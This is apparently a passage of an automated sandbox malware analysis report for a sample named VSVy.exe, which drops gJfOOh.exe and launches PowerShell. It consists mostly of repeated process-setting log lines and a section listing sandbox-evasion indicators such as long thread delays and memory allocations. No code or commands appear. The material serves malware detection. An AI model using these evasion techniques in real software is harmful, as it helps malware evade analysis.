              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 4F20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 5F20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 6050000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 7050000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: B4C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: C4C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: C950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: D950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: E950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: F950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 10950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 1280000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 4950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 4FE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 5FE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 6110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 7110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: AE20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: BE20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: C2B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 5360000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 6360000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: AE20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 2CB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 2F60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory allocated: 2CB0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\VSVy.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeThread delayed: delay time: 600000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5329Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8092Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exe TID: 2148Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exe TID: 6400Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep count: 5329 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5412Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep count: 161 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exe TID: 2140Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exe TID: 2140Thread sleep time: -600000s >= -30000sJump to behavior
